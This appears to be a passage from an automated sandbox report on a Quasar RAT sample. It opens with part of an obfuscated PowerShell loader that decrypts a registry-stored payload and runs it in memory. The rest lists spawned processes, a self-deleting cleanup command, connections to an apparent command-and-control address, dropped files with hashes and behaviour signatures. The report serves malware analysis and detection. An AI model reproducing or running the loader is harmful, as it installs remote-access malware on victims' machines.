'')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{38ad70bf-959b-489e-ae2d-e25d46f9883e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ec756ae8-5314-4cca-9af8-edd1eb90eafe}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{384b7751-ac97-498f-b52f-ad379fcc381b}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{86b6c022-1e9c-4c44-833a-580a6c38975b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{28aee83c-e9e1-4138-9f04-c7b6086bb192}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{76204e13-a5bc-44b3-bc60-508b516c4779}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{70f4f242-a443-4a22-a078-f94ca82ec1ed}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b3372018-fd1f-4b9c-998d-97b33aa5acbb}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{11b3a8ff-bc30-4d0b-a3a8-6f8035d59d47}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{339bbc9e-4285-411e-96ac-20fb030e4855}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e773df86-6fe6-4810-b7f8-c2aa615e2636}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3f218a6a-9b04-4d80-9875-a8c7a6f6521e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{420c71f7-7ee7-4613-a4cc-a63ec0aacd4a}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b5360dd6-5335-4280-946c-fa392e87983c}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4332 -ip 4332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 452
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{8a085641-610b-427f-9256-018d026f60bd}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6980 -ip 6980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 460
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{09a3e476-c522-411b-96b1-45e811dc9e90}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 6212 -ip 6212
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{6b4b94ba-5618-4a54-88ca-c5c3af5cc13f}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6212 -s 308
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | | tcp |
Files
memory/2724-0-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp
memory/2724-1-0x000002090B680000-0x000002090B83E000-memory.dmp
memory/2724-2-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-3-0x0000020926F00000-0x0000020926FE0000-memory.dmp
memory/2724-4-0x0000020927190000-0x0000020927336000-memory.dmp
memory/2724-5-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-6-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcp0kky2.5ou.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2096-16-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2096-17-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2096-18-0x00000212FD790000-0x00000212FD7B2000-memory.dmp
memory/2096-19-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-20-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp
memory/2724-21-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/2096-35-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2248-36-0x00000263B24E0000-0x00000263B2504000-memory.dmp
memory/2248-38-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/2248-37-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/2248-39-0x00000263CB7A0000-0x00000263CC1F0000-memory.dmp
memory/2248-41-0x00000263CC1F0000-0x00000263CC296000-memory.dmp
memory/2248-42-0x00000263CB4F0000-0x00000263CB546000-memory.dmp
memory/2248-43-0x00000263CC2A0000-0x00000263CC2F8000-memory.dmp
memory/2248-44-0x00000263B2510000-0x00000263B2532000-memory.dmp
memory/2248-45-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/2248-47-0x00000263CB150000-0x00000263CB15A000-memory.dmp
memory/3512-48-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4516-50-0x0000000000400000-0x0000000000406000-memory.dmp
memory/3512-49-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4516-51-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
memory/1452-74-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/1452-75-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/1452-76-0x000002A6C1CA0000-0x000002A6C2224000-memory.dmp
memory/1452-77-0x000002A6CA6F0000-0x000002A6CAEBA000-memory.dmp
memory/1452-78-0x000002A6CAEC0000-0x000002A6CB2FE000-memory.dmp
memory/1452-79-0x000002A6CB300000-0x000002A6CB3B2000-memory.dmp
memory/1452-80-0x000002A6C1980000-0x000002A6C19A2000-memory.dmp
memory/1452-81-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/1452-89-0x000002A6C2BD0000-0x000002A6C2C20000-memory.dmp
memory/1452-90-0x000002A6C2CE0000-0x000002A6C2D92000-memory.dmp
memory/1452-91-0x000002A6C2F70000-0x000002A6C3132000-memory.dmp
memory/1452-101-0x000002A6C2C20000-0x000002A6C2C5C000-memory.dmp
memory/1452-102-0x000002A6C2B80000-0x000002A6C2BCE000-memory.dmp
memory/1452-104-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/1452-105-0x000002A6C2C60000-0x000002A6C2C96000-memory.dmp
memory/1452-103-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/4864-106-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4864-107-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4864-109-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/4864-108-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/3024-110-0x0000000000400000-0x0000000000420000-memory.dmp
memory/3024-111-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4864-113-0x0000000140000000-0x0000000140028000-memory.dmp
memory/612-117-0x00000173C6C30000-0x00000173C6C52000-memory.dmp
memory/1020-122-0x0000013B75EE0000-0x0000013B75F07000-memory.dmp
memory/668-143-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/612-131-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/668-126-0x000001A7814A0000-0x000001A7814C7000-memory.dmp
memory/612-121-0x00000173C6C60000-0x00000173C6C87000-memory.dmp
memory/1020-133-0x00007FFED6870000-0x00007FFED6880000-memory.dmp
memory/3024-115-0x0000000000400000-0x0000000000420000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93B0.tmp.csv
| MD5 | 81b6a1aa910498f1b9f06a92554453c7 |
| SHA1 | 4c9b88339aacc52b0cae5549f1044d23902aade2 |
| SHA256 | 1986f4095088dc6ec0d62478ad96282f034d33f0cb9966811ab676196710bba0 |
| SHA512 | 992bd45b12f7adb74a7760b91e045a3ab7fbdf6540c4e9b7a03547ed00e26242f75948f5ae4d6b195fc3fe46986b9e2274ea8981ce5f78694c7172da28413230 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93D0.tmp.txt
| MD5 | 2ff2d0f22cfe74a4c03fa415fb61613d |
| SHA1 | 3dc75fdeed4c5d470dad4645431eb069448525a5 |
| SHA256 | 7b2a2a42d529f4b8f43b050853f4914b7c521ce94d33c19d5c4689afc51b985b |
| SHA512 | 0e0b55e132ac3d75439a8e2cff48f78a0f9662d693a434b60f7edd276a8bb366a26d32ca55e1da95375095601ccff0bf4367167d0fa371dac20d9b2f22edcdfd |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER943E.tmp.csv
| MD5 | 6be419f46a1070a4f7586d03536ec634 |
| SHA1 | 6307315ec2cbf31e9f878c1d69ea91d78d81e4ac |
| SHA256 | ee93755e9409aa4914055e2247c00ebde6da8f73f12d6294a7b9c5afd5b265b9 |
| SHA512 | 48911ee88e830898db5bf9dbe970c945d9ff89d641fe77b7ba12d0ed28b77bd84e21c4ccbb3dacfe503a16642e8d7282a65b7f128736a8a1eb08eedd9ca9b039 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9450.tmp.txt
| MD5 | e6f4de895e2235f6f56667b098b38ace |
| SHA1 | 18aa5b7b8f62e7959c1f64db4683b55d47f6e00d |
| SHA256 | 7fe01fe3002f96bb8259bf7102e7ff03c000b19dc43ba99fb4111dc130d4eab3 |
| SHA512 | 1baf657b291066d3198e4ecc361325aa17aaefb39f1dc00fc5903a0c686d59651cefcc8b5eb9160d9408795887f4e9dd8538f800ba3d567a832fcef658c40c84 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9460.tmp.txt
| MD5 | d5329c62382169aa20e0782e647bd479 |
| SHA1 | 2baa25cee8611a3d0f5140e73f96fd223bf87228 |
| SHA256 | 08a20fb30fb89c6be1aa5262aec8e70dee8b69f32405c6afe0ac30aa2e900493 |
| SHA512 | 0829ab94269729392ac47c6b7350f54746932f2bb171430a1b56eac06e80d308443f802538671337e5edfa2efaf59c7997429abb4dcd2197512a23e4c0506732 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10v2004-20240802-en
Max time kernel
60s
Max time network
60s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5804 created 376 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
